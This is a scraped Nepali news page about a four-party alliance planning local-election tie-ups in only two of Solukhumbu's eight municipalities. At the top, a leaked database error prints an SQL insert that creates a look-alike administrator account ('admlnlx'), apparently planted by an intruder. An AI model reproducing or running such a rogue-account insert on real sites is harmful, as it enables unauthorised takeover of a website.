WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bfgn4VNUz7YU5I7xiTdrXiCLq82q3A0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:41:47', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुमा दुई पालिकामा मात्र गठबन्धन गर्ने गृहकार्य हुंदै – Gaule Khabar

सोलुखुम्बुमा दुई पालिकामा मात्र गठबन्धन गर्ने गृहकार्य हुंदै

सोलुखुम्बुमा दुई पालिकामा मात्र गठबन्धन गर्ने गृहकार्य हुंदै

काठमाण्डौ । सोलुखुम्बुका आठ स्थानीय तहमध्ये छ पालिकामा मित्रवत् प्रतिस्पर्धा गर्ने र दुई पालिकामा मात्र स्थानीयस्तरमै तालमेलको गृहकार्य भइरहेको जनाएको छ ।

चारदलीय गठबन्धनले सल्लेरीमा बसेको बैठकमा जिल्लाको माप्य दुधकोशी गाउँपालिका र खुम्बु पासाङल्हामू गाउँपालिकामा मात्रै स्थानीय समितिलाई तालमेल गर्ने अधिकार दिएको छ। गठबन्धन भएको गाउँपालिकामा पालिका अध्यक्ष, उपाध्यक्ष, वडाअध्यक्ष र सदस्यहरुमा कुन पार्टीको उम्मेदवार बनाउने भन्ने जिम्मा स्थानीय समितिलाई दिने निर्णय गरिएको छ ।

नेचासल्यान र सोताङमा एमाले, थुलुङ दुधकोशी, महाकुलुङ र लिखुपिकेमा माओवादी र सोलुदुधकुण्डमा नेपाली कांग्रेसका उम्मेदवारले जीत हासिल गरेका थिए । जनता समाजवादी पार्टी र नेकपा एकिकृत समाजवादीको हकमा जनमत रहेको वडा तहमा समायोजन गर्ने सहमति भएको छ ।

माप्य दुधकोशी गाउँपालिका र खुम्बु पासाङल्हामू गाउँपालिका २०७४ सालको स्थानीय निर्वाचनमा एमालेका उम्मेदवार विजयी बनेका थिए। नेचासल्यान, सोताङ, महाकुलुङ, थुलुङ दुधकोशी, लिखुपिके गाउँपालिका र सोलुदुधकुण्ड नगरपालिकामा आ–आफ्नै उम्मेदवार उठाउने सर्वसम्मत निर्णय गरिएको नेकपा माओवादी केन्द्र, जिल्ला समन्वय समिति संयोजक असिम राईले जानकारी दिए।

कांग्रेस सभापति नाम्गेलजाङबु शेर्पाको अध्यक्षतामा बसेको गठबन्धन बैठकमा कांग्रेसका निर्वतमान सभापति विनोदकुमार बस्नेत, माओवादी केन्द्रका, सह–इन्चार्ज ध्रुव पराजुली, जिल्ला समन्वय समिति संयोजक असिम राई, जनता समाजवादी पार्टीका जिल्ला अध्यक्ष नरेन्द्र थापा मगर, नेकपा एकिकृत समाजवादीका केन्द्रीय सदस्य तथा जिल्ला इन्चार्ज आङङिमा लामाको उपस्थिती रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका